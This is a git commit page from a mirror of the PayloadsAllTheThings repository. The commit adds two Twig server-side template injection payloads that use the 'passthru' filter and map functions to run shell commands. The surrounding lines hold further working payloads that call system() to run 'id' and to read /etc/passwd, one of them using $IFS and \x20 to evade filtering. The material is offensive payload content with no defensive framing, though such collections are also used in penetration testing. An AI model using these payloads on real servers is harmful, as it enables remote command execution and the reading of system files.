ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-19 19:06:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added 'passthru' filter exploits

Browse Source
This commit is contained in:
Tom Wilford 2023-04-28 14:47:59 +01:00 committed by GitHub
parent 1e66a42bba
commit c1dc141e13
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
Server Side Template Injection/README.md
View File

@ -966,6 +966,8 @@ $output = $twig > render (
{{['id',1]|sort('system')|join}} {{['id',1]|sort('system')|join}}
{{['cat\x20/etc/passwd']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}} {{['cat$IFS/etc/passwd']|filter('system')}}
{{['id']|filter('passthru')}}
{{['id']|map('passthru')}}
``` ```
Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is)